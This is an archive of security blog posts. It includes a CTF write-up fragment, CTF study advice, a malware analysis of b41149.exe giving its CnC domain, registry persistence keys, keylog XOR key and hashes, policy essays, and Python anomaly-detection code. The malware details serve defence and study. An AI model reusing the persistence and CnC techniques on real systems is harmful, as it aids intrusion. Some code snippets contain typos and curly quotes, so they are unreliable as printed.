$ ./nonameyet.cgi < formdata
Angry Rhinoceros And then I found five dollars.

The only thing left to do is to send this over a socket to the web server so that I can pull back the flag on the remote system. Too bad the service was offline by the time I completed the challenge.

There are other ways to go about landing this stack overflow. Another public write up is here (in Chinese). It looks like this team made a ROP chain to getenv() that would read in cookie data. The same stack overflow bug was used.

Big thanks to HJ and Legit BS for a fun CTF problem. I spent way too much time playing with it. If you enjoyed this walk through or have questions or comments, you are welcome to email me: svittitoe at endgame.com.

↧

How to Get Started in CTF

June 9, 2014, 11:30 am

≫ Next: Technical Analysis: Binary b41149.exe

≪ Previous: DEFCON Capture the Flag Qualification Challenge #2

Over the past two weeks, I’ve examined two different problems from the DEFCON 22 CTF Qualifications: “shitsco” and “nonameyet”. Thank you for all of the comments and questions. The most popular question I received was “How can I get started in CTFs?” It wasn’t so long ago that I was asking myself the same thing, so I wanted to provide some suggestions and resources for those of you interested in pursuing CTFs. The easiest way to start is to sign up for an introductory CTF like CSAW, Pico CTF, Microcorruption, or any of the other dozens available. Through practice, patience, and dedication, your skills will improve with time.

If you’re motivated to take a crack at some of the problems outside of the competition setting, most CTF competitions archive problems somewhere. Challenges tend to have a wide range of difficulty levels as well. Be careful about just picking the easiest problems. Difficulty is subjective based on your individual skillset. If your forte is forensics but you are not skilled in crypto, the point values assigned to the forensics problems will seem inflated while the crypto challenges will seem undervalued to you. The same perception biases hold true for CTF organizers. This is one reason why assessing the difficulty of CTF problems is so challenging.

If you’ve tried several of the basic problems on your own and are still struggling, then there are plenty of self-study opportunities. CTF competitions generally focus on the following skills: reverse engineering, cryptography, ACM style programming, web vulnerabilities, binary exercises, networking, and forensics. Pick one and focus on a single topic as you get started.

1) Reverse Engineering. I highly suggest that you get a copy of IDA Pro. There is a free version available as well as a discounted student license. Try some crack me exercises. Write your own C code and then reverse the compiled versions. Repeat this process while changing compiler options and program logic. How does an “if” statement differ from a “select” in your compiled binary? I suggest you focus on a single architecture initially: x86, x86_64, or ARM. Read the processor manual for whichever one you choose. Book recommendations include:

2) Cryptography. While this is not my personal strength, here are some resources to check out:

3) ACM style programming. Pick a high level language. I recommend Python or Ruby. For Python, read Dive into Python (free) and find a pet project you want to participate in. It is worth noting that Metasploit is written in Ruby. Computer science classes dealing with algorithms and data structures will go a long way in this category as well. Look at past programming challenges from CTF and other competitions – do them! Focus on creating a working solution rather than the fastest or most elegant solution, especially if you are just getting started.

4) Web vulnerabilities. There are many web programming technologies out there. The most popular in CTF tend to be PHP and SQL. The php.net site is a fantastic language reference. Just search any function you are curious about. After PHP, the next most common way to see web challenges presented is with Python or Ruby scripts. Notice the overlap of skills? There is a good book on web vulnerabilities, The Web Application Hacker’s Handbook. Other than that, after learning some of the basic techniques, you might also think about gaining expertise in a few of the more popular free tools available. These are occasionally useful in CTF competitions too. This category also frequently overlaps with cryptography in my experience.

5) Binary exercises. This is my personal favorite. I recommend you go through reverse engineering before jumping into the binary exercises. There are a few common vulnerability types you can learn in isolation: stack overflows, heap overflows, and format string bugs for starters. A lot of this is training your mind to recognize vulnerable patterns. Looking at past vulnerabilities is a great way to pick up these patterns. You should also read through:

6) Forensics/networking. A lot of CTF teams tend to have “the” forensics guy. I am not that guy, but I suggest you learn how to use the 010 hex editor and don’t be afraid to make absurd, wild, random guesses as to what could be going on in some of these problems.

Finally, Dan Guido and company recently put out the CTF field guide, which is a great introduction to several of these topics.

↧

Technical Analysis: Binary b41149.exe

June 15, 2014, 11:30 am

≫ Next: The Great Divide: Closing the Gap in Cyber Analysis

≪ Previous: How to Get Started in CTF

In keeping with the theme of my previous post, “malware never truly dies – it just keeps on compromising”, today I’d like to investigate a binary that surfaced a couple of months ago. While the binary itself is young, the domain it reaches back to for Command and Control (CnC) has been used by nefarious binaries - like Cryp_SpyEye, AUTOIT.Trojan.Agent-9 and TROJ_SPNR - since at least October 2012. Hence, this is another example of how “old” malware continues to compromise long after it has been discovered.

What really caught my eye about this binary was one of its obfuscation techniques. The literal file name of the binary is unknown, so for the purposes of examining it, I renamed it b41149.exe, which are the first six characters of its SHA256 hash. The complete hash will be provided later in the file identifier section.

An initial look at b41149.exe revealed it to be a custom-packed binary with an internal file name of “microsft.exe”, complete with a Microsoft icon (see Figure 1).

Image may be NSFW.
Clik here to view.
Figure 1: Binary Icon

Even more interesting was an embedded JPEG at offset 11930A. As of this writing, no purpose for this JPEG has been uncovered. Could this be some type of calling card? Figure 2 reflects the embedded JPEG in a hex view while Figure 3 displays the actual image file.

Image may be NSFW.
Clik here to view.
Figure 2: Hew View of Embedded JPEG

Image may be NSFW.
Clik here to view.
Figure 3: Embedded JPEG Inside b4119.exe

Another curious aspect of b41149.exe, and undoubtedly much more important than the JPEG, was the fact that it contained a Unicode-encoded binary between offset 508B and offset 117C0A. This is the part that really caught my eye. I’ve seen embedded binaries obfuscated in this manner primarily in RTF files, and also in PDFs and DOCs, but I personally haven’t come across one yet that used this obfuscation scheme while embedded inside another binary. It turns out the embedded binary is the real workhorse here, and Figure 4 reflects how it appears inside b41149.exe.

Image may be NSFW.
Clik here to view.
Figure 4: Unicode-encoded Binary Inside b4119.exe

B41149.EXE in Runtime

Upon execution, b41149.exe self-replicates to C:\WINDOWS\System32\mony\System.exe with hidden attributes. In addition, a visibly noticeable command shell is opened. System.exe, the malware’s running process, then hooks to the malware-spawned command shell. However, upon reboot, System.exe hooks to the default browser rather than a command shell, but since the browser window isn’t opened this would not be visibly noticeable to the affected user. Additionally, during runtime, b41149.exe self-replicates to six other locations throughout the system and creates one copy of itself that has the following 10 bytes appended to it - 0xFE154DE7184501CD2325. The binary also sets several registry value keys and stores encoded keylog data as logs.dat in the logged on users %AppData% folder. Once loaded, the running process attempts to connect to a.servecounterstrike.com over port 115, and it persists on a victim host through a registry RUN key as well as on a copy of the binary in Start Up. The following table provides a chronological gist of the malware on a victim host during runtime.

Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
Table 1: Chronological Gist of Malware on an Infected Host

As previously stated, the Unicode-encoded binary embedded inside b41149.exe (reflected in Figure 4) is the real power of this malware - it does all the heavy lifting. As a stand-alone binary, it will do everything described in Table 1, except the self-replications, other than to %System%\mony\System.exe. In light of this, the remaining code in b41149.exe appears to be responsible for the other self-replications. However, before the embedded binary is functional (as a stand-alone), the PE Header must be fixed and 1,391 4-byte blocks of 0x00002000 must be removed. These 4-byte blocks of ‘filler’ are inserted every 400 bytes. The exact reason for this is unknown, but I would guess it’s to hinder reversing efforts. Once fixed, however, the binary will run independently and without any degradation of maliciousness.

The keylogged data file, logs.dat, is encoded with a 30-byte key, but not in its entirety. Each new process, such as notepad, a command shell, browser, etc., spawns a new line of keylogged data. And each line is delimited with #### (or 0x23232323). The key is then applied to each new line, following the delimiter. Deep dive analysis has not yet been done to uncover the actual encoding algorithm or loop. However, the encoded logs.dat file can be decoded by applying the following 30-byte key after each delimiter: 0E0A0B16050E0B0E160A05020304040C010B0E160604160A0B0604130B16. Figure 5 contains a hex view sample of the encoded logs.dat file.

Image may be NSFW.
Clik here to view.
Figure 5: Hex View of Encoded Keylogged Data in LOGS.DAT

The following table demonstrates the decoding process for the first line of logs.dat. Each encoded byte is XOR’d with its corresponding byte from the key, producing the decoded byte. For example 0x75 XOR with 0x0E becomes 0x7B; or in ASCII, U becomes {.

Image may be NSFW.
Clik here to view.
Table 2: Keylogger Decoding Scheme

Since the encoded line in Table 2 was only 9 bytes long, only the first 9 bytes of the key were utilized. However, the key does not resume from byte 10 on the next line of encoded text. It starts back from the beginning of the key (e.g. 0x0E0A0B, etc.) and it will repeat itself until that line of data concludes. To illustrate this further, the following table presents three different lines of encoded ASCII text followed by its decoded version. The alphabetic characters of the decoded text are upper case/lower case inverted, while the numeric and special characters are displaying normally.

Image may be NSFW.
Clik here to view.
Table 3: Decoded Keylog Data

The most critical component of this malware runs in memory, but it’s written to disc ever so briefly by b41149.exe. The temporary file, “XX—XX—XX.txt”, is resident on the system for only a fraction of a second in the logged-on user’s %Temp% directory. Once running, the malware-spawned command shell deletes it (as reflected above in Table 1). XX—XX—XX.txt is XOR encoded with 0xBC, and once decoded, it contains the name of the reach back CnC domain a.servecounterstrike.com, as well as a UPX-packed dynamic link library (DLL) file. Strings of the DLL suggest it contains remote access tool (RAT) capability. In addition, since the DLL runs in memory, and XX—XX—XX.txt does not remain resident on the victim host, its presence could be difficult to determine.

The beginning of XX—XX—XX.txt displays the un-encoded file structure path from where the malware was executed. This string is followed by the path of the running process, which is the self-replicated System.exe. Immediately after is where the XOR encoded CnC reach back domain and the connection port are located. A single byte XOR key, 0xBC, is used for this, and Figure 6 reflects a “before and after” encoding look at the beginning portion of XX—XX—XX.txt.

Image may be NSFW.
Clik here to view.
Figure 6: XX—XX—XX.txt Before and After Encoding

The DLL embedded inside XX—XX—XX.txt is near offset 1C192, but this is dependent upon the length of the path name from which the malware was executed. Figure 7 reflects a “before and after” encoding look at the embedded DLL’s DOS stub.

Image may be NSFW.
Clik here to view.
Figure 7: XOR Encoded DOS Stub Inside XX—XX—XX.TXT

As stated above, the DLL is UPX packed, but once unpacked, it reveals some interesting strings that provide some insight into its functionality. Table 4 lists some strings of interest.

Image may be NSFW.
Clik here to view.
Table 4: Strings of Interest

Persistency is a key component of malware, and b41149.exe persists on the victim host through several mechanisms, such as the following registry RUN keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Policies: "C:\WINDOWS\system32\mony\System.exe"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HKLM: "C:\WINDOWS\system32\mony\System.exe"

In addition, a copy of the binary is stored in the user’s start up folder as WinUpdater.exe. However, 10 bytes are appended to the binary as shown in figure 8.

Image may be NSFW.
Clik here to view.
Figure 8: Trailing Byte Comparison of B41149.EXE / WINUPDATER.EXE

An autorun.inf file is also created in the root of the C:\ directory. Below is the content of the INF file, which opens apphelp.exe - also located in the root of C.

[autorun]
open=apphelp.
ACTION=
Perform a Virus
Scan
[autorun]
open=apphelp.
ACTION=
Perform a Virus
Scan

One unusual aspect of this malware is that while the main action takes place in memory, it is actually very noisy in terms of activity on the victim host. It writes, deletes, then rewrites two files in rapid succession to the logged-on user’s %Temp% directory. The files are XxX.xXx and UuU.uUu. Each file contains the current timestamp of the victim host in an HH:MM:SS format. No other data is contained within those files. Interestingly, XxX.xXx is rewritten at half-second intervals, while UuU.uUu is rewritten every five seconds. Figure 9 displays the contents of these files captured moments apart from one another.

Image may be NSFW.
Clik here to view.
Figure 9: Content of XXX.XXX AND UUU.UUU

The most obvious sign of something being not quite right here is that upon execution, this binary spawns a command shell window for the user and everyone else to see. The shell is not a user interactive, because it cannot be typed in. However, if the shell is closed (or terminated), the malicious process, C:\WINDOWS\system32\mony\System.exe, restarts automatically. Interestingly, upon system reboot, the malicious process System.exe hooks to the default browser and runs as previously described, but it does not spawn a browser window. It’s possible that the visual command shell window is intended to trick the user into thinking there’s something wrong with the system, thus prompting a reboot.

Network Activity

As previously stated, the binary connects to a.servecounterstrike.com, which is compiled in memory. Upon execution of the binary, the victim host sends a DNS query for a.servecounterstrike.com, and once an IP address is returned, begins sending periodic SYN packet to the returned IP address over port 115, presumably until the attacker responds or until it receives further command from its CnC node. Figure 10 shows the PCAP of a compromised host’s initial connection with the malicious domain. This activity was captured from within an enclosed virtual network.

Image may be NSFW.
Clik here to view.
Figure 10: Initial Connection from a Compromised Host

During the short period in which the compromised virtual machine was left online, no return attacker activity occurred, so it’s undetermined what would transpire in the long term if this were an actual compromised online host.

Stay tuned for a follow-up post once I do some deeper dive analysis of this binary. For now, I’ll leave you with some hashes. Enjoy.

File Identifiers

File: b41149.exe Size: 1343488 MD5: f20b42fc2043bbc4dcd216f94adf6dd8 SHA1: 4d597d27e8a0b71276aee0dcd8c5fe5c2db094b0 SHA256: b41149a0142d04ac294e364131aa7d8b9cb1fd921e70f1ed263d9b5431c240a5 ssdeep: 6144:hEnCDKEJkKspH02n/M+WJ/04KLuqju11M+HDKsR:h9DdspH02004fqjujM+HGs Compile Time: 4F605417 (Wed, 14 March 2012 08:17:27 UTC) Compile Version: Microsoft Visual Basic 5.0 / 6.0 Internal File Name: Microsft.exe

File: embedded_ascii-encoded_bianry.exe (with fixed PE Header and “filler” byte blocks removed) Size: 277869 MD5: a47d9f42a1a1c69bc3e1537fa9fa9c92 SHA1: b2d588a96e29b0128e9691ffdae0db162ea8db2b SHA256: c17cb986ccd5b460757b8dbff1d7c87cd65157cf8203e309527a3e0d26db07e3 ssdeep: 6144:8k4qmyY+DAZCgIqiEM3OQFUrsyvfEUKMnqVZ:P9wQuCvjdordEGn6

File: c:\WINDOWS\system32\mony\System.exe (dropped by embedded Unicode encoded binary) Size: 277869 MD5: a47d9f42a1a1c69bc3e1537fa9fa9c92 SHA1: b2d588a96e29b0128e9691ffdae0db162ea8db2b SHA256: c17cb986ccd5b460757b8dbff1d7c87cd65157cf8203e309527a3e0d26db07e3 ssdeep: 6144:8k4qmyY+DAZCgIqiEM3OQFUrsyvfEUKMnqVZ:P9wQuCvjdordEGn6

File: embedded DLL in XX–XX–XX.txt Size: 120320 MD5: c1bc1dfc1edf85e663718f38aac79fff SHA1: 9d01c6d2b9512720ea7723e7dec5e3f6029aee3d SHA256: 5468be638be5902eb3d30ce8b01b1ac34b1ee26b97711f6bca95a03de5b0db24 ssdeep: 3072:dk7/I/KbMm4oIP9zaj1WyWBiyhdYKC0iwsUukhh3a:dkDuK4m4jWjv+nCksfQB

File: embedded DLL in XX–XX–XX.txt (unpacked) Size: 329728 MD5: f920cee005589f150856d311b4e5d363 SHA1: 2589fa5536331a53e9a264dd630af2bdb6f6fc00 SHA256: 1fd16ca095f1557cc8848b36633d4c570b10a2be26ec89d8a339c63c150d3b44 ssdeep: 6144:iQoh1rcU8kHOEkzsz+F97pk1nJJn7TB82R:j2RbHOEkzsaXmxn7T

↧

The Great Divide: Closing the Gap in Cyber Analysis

June 19, 2014, 11:30 am

≫ Next: Analysis: Three Observations About the Rise of the State in Shaping Cyberspace

≪ Previous: Technical Analysis: Binary b41149.exe

In 2010, General Michael Flynn co-authored a report entitled Fixing Intel critiquing the threat-centric emphasis within counterinsurgency intelligence analysis. The report, which made waves in the intelligence community (IC), called for an organizational and cultural shift within the analytical and operational approach to counterinsurgency, highlighting the gap in data collection and the resulting lack of holistic situational awareness critical for decision-making. Recently, the Chief Analytic Methodologist at DIA, Josh Kerbel, reinforced these arguments while extending them beyond counterinsurgency to apply to all missions across the IC writ large. Noting that the IC is at a Kodak moment, he argues that the IC must move beyond the Cold War business model and modernize in light of the dynamic and diverse threats present in the current operating environment.

Having spent a significant amount of time both as an analyst and interviewing analysts across a wide range of intelligence agencies and Combatant Commands, I now see significant parallels within the cyber domain. While cyber is a much more nascent field, it is already widely recognized that there is a gap between the very tactical and technical nature of the cyber domain and the information relayed to leadership. The DoD’s inclusion of cyberspace as an official domain of warfare certainly indicates its relevance for the foreseeable future and there are plenty of lessons to learn, both from the CT realm as well as from the larger IC perspective, in order to make cyber analysis relevant for leadership. Two of the most pertinent lessons, which I’ll address in further detail, are: 1) contextualizing challenges and 2) translation between practitioners and leadership.

1) Contextualization: As both Kerber and the Flynn report note, for more than a decade the IC has been preoccupied with a threat-centric view of terrorism, which in turn focuses on targeted collection. Similarly, the cyber domain currently seems to take a threat-centric approach, again with an emphasis on targeted collection. In both cases, an emphasis on the nodes omits the larger picture that leadership requires to make informed decisions. It is indicative of the proverbial inability to see the forest for the trees. Nevertheless, cyber intelligence should cross the strategic, operational, and tactical domains to provide insight at each level of analysis. There is great utility in both private and public organizations understanding the larger picture and context of the cyber challenges within the operating environment.

2) Translation required: Kerber emphasizes the behavioral component of customer-driven production, noting analysts must understand what the policymakers are trying to accomplish and provide a service that meets those needs. This, he argues, is counter to the current strategy of assuming relevance of a product because it is based on unique information. This is identical to the disciplinary gaps seen today in the cyber domain. Too often, the hyper-technical delivery of cyber information and analysis to leadership is packaged in a language and format that quite simply are not useful for decision makers. Insights from cyber analysis will not reach their full potential if we cannot transform the technical jargon into a language that leaders can understand. Fixing Intel notes that the IC “is a culture that is strangely oblivious of how little its analytical products, as they now exist, actually influence commanders.” This gap arguably already haunts the cyber domain, where very technical products are either not directly relevant for or are incomprehensible to leadership. Until this necessary translation happens, and until we can move towards a common framework for the cyber domain, the divide between the cyber analysis and policy communities, and between leadership and cyber practitioners, will remain.

↧

Analysis: Three Observations About the Rise of the State in Shaping Cyberspace

July 8, 2014, 11:30 am

≫ Next: Time Series Analysis for Network Security

≪ Previous: The Great Divide: Closing the Gap in Cyber Analysis

Last month commemorated the 100th anniversary of the start of World War I. It was a time when states were so interdependent and borders so porous that some call it the first era of globalization. In fact, immediately prior to World War I, many forecast that interdependence would be the predominant driving force for the foreseeable future, diminishing states’ tendencies toward war and nationalism. World War I immediately halted this extensive global interdependence, in large part due to rising nationalism and the growth of inward-facing policies. On the surface, there seems to be little in common between that era and the current Digital Age. However, the misguided presumption prior to World War I that interdependence would render states’ domestic interests obsolete is at risk of resurfacing in the cyber domain. Given the narrow focus on connectivity during previous waves of interdependence, here are three observations about the role of the state in the Digital Age worth considering:

1) In “borderless” cyberspace, national borders still matter. Similar to perspectives on the growth of interdependence prior to World War I, there is currently an emphasis on the borderless, connected nature of cyberspace and its uniform and omnipresent growth across the globe. While borders – both virtual and physical – have become more porous, the state nevertheless is increasingly impacting the structure and transparency of the Internet. From Russia’s recent expansion of web control to Brazilian-European cooperation for underground cables, there is a growing patchwork approach to the Internet – all guided by national interests to maintain control within state borders.

2) “Data Nationalism” is the new nationalism of the Digital Age. While traditional nationalism still exists, thanks to the information revolution it now manifests in more nuanced ways. “Data nationalism”, where countries seek to maintain control of data within their physical borders, has strong parallels to traditional nationalism. In both cases, nationalism serves as a means to shape and impact a state’s culture and identity. As history has shown, states – and the governments running them – aim to maintain sovereign control of their territory and stay in power. Nationalistic tendencies, especially state preservation, tend to strongly influence the depth and structure of connectivity among people and states. This was true one hundred years ago, and it is true today. States are disparately invoking national legislation and barriers to exert their “data nationalism” within a virtual world, possibly halting the great expansion of access and content that has occurred thus far. Just as nationalism and states’ interests eventually altered the path of the first era of globalization, it is essential to acknowledge the growing role of the state in shaping the Internet during the Digital Age.

3) Although a technical creation, the cyber domain is not immune from the social construct of states’ interests. During each big wave of globalization and technological revolution, the idea that interdependence will triumph and trump individual states’ interests emerges. However, this idea discounts the role of the state in continuing to shape and maintain sovereign control while simultaneously influencing the structure of the newly connected system. This is true even in the cyber realm, which is not immune to the self-interest of states. From the great firewall of China to various regulations over content in Western European countries to Internet blackouts in Venezuela, states are increasingly leveraging their power to influence Internet access and control data and content within their borders. This has led to a growing discussion of the “Splinternet” or Balkanization of the Internet, which refers to the disparate patchwork of national policies and regulations emerging globally. Running counter to the ideals of openness and transparency on which the Internet was founded, it comes as no surprise to international relations scholars that states would seek to control (as best as possible) the cyber domain.

The role of self-interested states has largely been absent from discussions pertaining to the future of the Internet. Fortunately, there is a growing dialogue on the impact of national barriers and disparate national legislation on the Internet’s evolution. A recent article in The Atlantic reflects on the growing fractionalization of the Internet, and is reminiscent of earlier eras’ articles about the hub-and-spoke system of international trade. Similarly, a Pew Research Center poll highlights concern over the potential fractionalization of the Internet due to state intervention. As we continue to consider how the Internet will evolve and how policymakers will respond to an increasingly interconnected digital domain, we must not ignore the inherent tendency of states to demarcate both physical and virtual control within their sovereign borders.

↧

Time Series Analysis for Network Security

July 16, 2014, 11:30 am

≫ Next: Building Security Threat Models for Time Series Analysis

≪ Previous: Analysis: Three Observations About the Rise of the State in Shaping Cyberspace

Last week, I had the opportunity to attend a conference that had been on my radar for a long time. I’ve been using scientific Python tools for about 10 years, so it was with great excitement that I attended SciPy 2014 in Austin. I enjoyed meeting the developers of this excellent open-source software as well as other enthusiastic users like me. I learned a great deal from talks about some Python tools I haven’t yet tried but should really already be using, like conda, bokeh, and others. I also gave a talk describing how I have been using the SciPy stack of software in my work here at Endgame. In this post, I’ll summarize and expand on the first half of my presentation.

My work at Endgame has focused on collecting and tracking metrics associated with network and device behavior. By developing a model of normal behavior on these metrics, I can find and alert users when that behavior changes. There are several examples of security threats and events that would lead to anomalies in these metrics. Finding them and alerting our users to these threats as soon as possible is critical.

The first step in finding anomalies in network and device behavior is collecting the data and organizing it into a collection of time series. Our data pipeline here at Endgame changes rapidly as we develop tools and figure out what works and what doesn’t. For the purposes of this example, the network traffic data flows in the following way:

Image may be NSFW.
Clik here to view.

Apache Kafka is a distributed messaging system that views messages as a log. As data comes in, Kafka takes care of receiving it and distributing it to other systems that have subscribed to it. A separate system archives this data to HDFS for later processing over historical records. Reading the data from the Kafka servers allows my database to stay as current as possible. This allows me to send alerts to users very soon after a potential problem occurs. Reading historical data from HDFS allows me to backfill metrics once I create a new one or modify an existing one. After all of this data is read and processed, I fill a Redis database with the time series of each metric I’m tracking.

The three Python tools that I use throughout this process are kairos to manage the time series database, kafka-python to read from Kafka, and pyspark to read from HDFS. I chose each project for its ease of use and ability to get up to speed quickly. They all have simple interfaces that abstract away complicated behavior and allow you to focus on your own data flow. Also, by using a Python interface to old and new data, I can share the code that processes and compares data against the metrics I’ve developed.

I gave my presentation on the third and final day of SciPy. Up until that point, I hadn’t heard Apache Spark or pyspark mentioned once. Because of this, I spent an extra minute or two evangelizing for the project. Later, the Blaze developers gave a similar endorsement. It’s good to know that I’m not alone in the scientific Python community in loving Spark. In fact, before using Spark, I had been running Pig scripts in order to collect historical data. This required a bunch of extra work to run the data through the Python processing scripts I had already developed for the real-time side of things. Using Spark definitely simplified this process.

The end result of all this work is an easily accessible store of all the metrics. With just a couple lines of code, I can extract the metric I’m interested in and convert it to a pandas Dataframe. From there, I can simply analyze it using all of the scientific computing tools available in Python. Here’s an example:

# Make a connection to our kairos database
from redis import Redis
from kairos import Timeseries
intervals = {"days" : {"step" : 60, "steps" : 2880},"months" : {"step" : 1800, "steps" : 4032}}
rclient = Redis(“localhost”, 6379)
ktseries = Timeseries(rclient, type="histogram”, intervals=intervals)

# Read data from our kairos database
from pandas import DataFrame, to_datetime
series = ktseries.series(metric_name, “months”)
ts, fields = zip(*series.items())
df = DataFrame({"data” : fields}, index=to_datetime(ts, unit="s"))

And here’s an example time series showing the number of times an IP has responded to connection requests:

Image may be NSFW.
Clik here to view.

Thanks for reading. Next week I’ll talk about the different models I’ve built to make predictions and find anomalies in the time series that I’ve collected. If you’re interested in viewing the slides from my presentation, I’ve shared them here.

↧

Building Security Threat Models for Time Series Analysis

July 21, 2014, 11:30 am

≫ Next: Report Analysis: A Data-Driven Approach to Cybersecurity

≪ Previous: Time Series Analysis for Network Security

In my last post, I talked about the different Python projects I used to put together a pipeline for network security data. In this post, I’ll talk about how I used the scientific computing software stack in Python (numpy, scipy, and pandas) to build a model around that data and detect outliers. We left off last week with a pandas DataFrame containing example data:

Image may be NSFW.
Clik here to view.

This plot is an example taken from the database that shows the number of times an IP responds to connection requests over time. In order to find potential security threats, I’d like to find outliers in this and any other time series. In order to find outliers, I need to build a model around what I believe is normal behavior based on past data.

The most simplistic approach to building a model is to take the mean and standard deviation of the data I’ve seen so far. I can then treat the mean as a prediction of the next value and generate an alert when the actual value exceeds a configurable number of standard deviations from that prediction. The results of that simple algorithm are shown below:

Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.

In this plot and the ones that follow, the actual number of connections observed is in blue. The green window is centered on the prediction made for that time bin and extends one standard deviation in each direction. A red vertical line is drawn when the actual data is a configurable distance away from that prediction window.

As you can see in this first model, the prediction window is not highly correlated with the data and the spread is very large. A better model would be to fit the data to a sine curve using the tools that scipy provides. The prediction is the fit value and the standard deviation is derived from the residuals to the fit:

Image may be NSFW.
Clik here to view.

from scipy.optimize import leastsq

def fitfunc(p, x) :
  return (p[0] * (1 - p[1] * np.sin(2 * np.pi / (24 * 3600) * (x + p[2]))))

def residuals(p, y, x) :
  return y - fitfunc(p, x)

def fit(tsdf) :
  tsgb = tsdf.groupby(tsdf.timeofday).mean()
  p0 = np.array([tsgb[“conns”].mean(), 1.0, 0.0])
  plsq, suc = leastsq(residuals, p0, args=(tsgb[“conns”], np.array(tsgb.index)))
  return plsq

Image may be NSFW.
Clik here to view.

At least on weekdays, the prediction mirrors the data better and the window is tighter. But we can improve these models even further. When looking through the data, it became apparent to me that different kinds of metrics required totally different models. I therefore developed a method for classifying the time series by asking two different questions:

Does this metric show a weekly pattern (i.e. different behavior on weekdays and weekends?)
Does this metric show a daily pattern?

In order to answer the first question, I fit the sine curve displayed above to the data on weekdays and weekends separately and compared the overall level of the fit (the p0 parameter in the equation above). If the levels differed, then I would build a model for the weekday data separately from the weekend data. If the overall levels of those fits were similar, then I kept that time series intact.

def weekend_ratio(tsdf) :

  tsdf['weekday'] = pd.Series(tsdf.index.weekday < 5, index=tsdf.index)
  tsdf['timeofday'] = (tsdf.index.second + tsdf.index.minute * 60 + tsdf.index.hour * 3600)

  wdayplsq = fit(tsdf[tsdf.weekday == 1])
  wendplsq = fit(tsdf[tsdf.weekdy == 0])
  return wendplsq[0] / wdayplsq[0]

Image may be NSFW.
Clik here to view.

In the plot above, I show the weekday and weekend fits in red. For this data, the behavior of the time series on weekdays and weekends was different enough that I decided to treat them separately.

The next step is to determine if the time series displays daily patterns. In order to do this, I use numpy to take the Fourier transform of the time series and inspect the bins associated with a frequency of a day. I sum the three bins closest to that frequency and compare them to the first bin or the DC component. If the sum is large enough compared to that first bin, then the time series is classified as having a daily pattern.

def daily_ratio(tsdf) :

  nbins = len(tsdf)
  deltat = (tsdf.index[1] - tsdf.index[0]).seconds
  deltaf = 1.0 / (len(tsdf) * deltat)
  daybin = int((1.0 / (24 * 3600)) / deltaf)

  rfft = np.abs(np.fft.rfft(tsdf[“conns”]))
  daily_ratio = np.sum(rfft[daybin - 1:daybin + 2]) / rfft[0]

  return daily_ratio

Plots are sometimes the best way to explain these results, so I show two examples of the procedure below. In the first example, I show all the weekday data together in blue and the Fourier transform of that data in green. Red lines highlight the values corresponding to the frequency of a day in the Fourier transform data. The spike there is obvious and indicates a strong daily pattern.

Image may be NSFW.
Clik here to view.

The next figure shows the second example of the daily classification procedure. Here, the weekend data is combined in blue and the Fourier transform of that is in green. The Fourier transform data is flat and tells me that there is no daily pattern in this data.

Image may be NSFW.
Clik here to view.

The next step in the analysis is to apply a predictive model to the weekdays and weekends separately. In both cases, I apply an exponentially weighted moving average (EWMA). This calculation weights more recently occurring data more heavily in the calculation of an average. Trends and events in the past have less and less of an effect on future predictions. It’s a very simple calculation to do in pandas:

def ewma_outlier(tsdf, stdlimit=5, span=15) :
  tsdf[’conns_binpred’] = pd.ewma(tsdf[‘conns’], span=span).shift(1)
  tsdf[’conns_binstd’] = pd.ewmstd(tsdf[‘conns’], span=span).shift(1)
  tsdf[‘conns_stds’] = ((tsdf[‘conns’] – tsdf[’conns_binpred’]) /
                         tsdf[‘conns_binstd’])
  tsdf[‘conns_outlier’] = (tsdf[‘conns_stds’].abs() > stdlimit)
  return tsdf

For time series that show no daily pattern, such as the weekend days of the example data we’ve been working with, I calculate the moving average and standard deviation and flag outliers when the actual data is a certain number of standard deviations away from the average. This procedure works best for data that does not vary significantly over time. It does not work as well when predictable daily patterns are present. In this case, the moving average lags the actual data in a predictable way that I should be able to account for. I’ve been calling this method a “stacked EWMA” because I group the data by time of day and stack each day on top of another. The next scatter plot shows the data stacked in this way.

Image may be NSFW.
Clik here to view.

Each vertical line corresponds to the number of connection responses occurring during a certain time of day over the span of about three weeks. Now I track the EWMA of the data in each of those vertical lines separately. This is illustrated in the next plot.

Image may be NSFW.
Clik here to view.

Here, the number of connection responses between 8AM and 8:30AM are expanded over the range of days on which they were collected. The green solid line shows the EWMA calculated from just those points and the dashed green line shows the edges of the prediction window. The same analysis is carried out for each time of day bin. After it’s completed, I have a prediction window for each bin that’s based on what’s happened at this time of day over the previous days and weeks. Here is the code that completes this stacked analysis:

def stacked_outlier(tsdf, stdlimit=4, span=10) :

  gbdf = tsdf.groupby(‘timeofday’)[colname]
  gbdf = pd.DataFrame({‘conns_binpred’ : gbdf.apply(pd.ewma, span=span),
                       ‘conns_binstd’ : gbdf.apply(pd.ewmstd, span=span)})
  interval = tsdf.timeofday[1] - tsdf.timeofday[0]
  nshift = int(86400.0 / interval)
  gbdf = gbdf.shift(nshift)
  tsdf = gbdf.combine_first(tsdf)
  tsdf[‘conns_stds’] = ((tsdf[‘conns’] – tsdf[‘conns_binpred’]) / tsdf[‘conns_binstd’])
  tsdf[‘conns_outlier’] = (tsdf[‘conns_stds’].abs() > stdlimit)
  return tsdf

Image may be NSFW.
Clik here to view.

This last plot shows the final result when the weekday and weekend models are executed and combined in the same figure. Daily patterns are predicted and accounted for. Flat periods during the weekends are well tracked. In further testing, this prediction model is very robust to different types of time series.

In the future, I’d like to create some metric for judging different prediction models that adequately penalizes for false positives and false negatives. I’d also like to further experiment with ARIMA (autoregressive integrated moving average) models and automatically finding repeated patterns instead of counting on them occurring in daily and weekly time spans. Also, a different technique will probably be necessary for time series with low statistics.

Thanks so much for reading. I hope you’ve learned a bit about the simplicity and power of working with the scientific computing stack in Python and its applications to network security data. I’ve posted the slides from which this material was taken here.

↧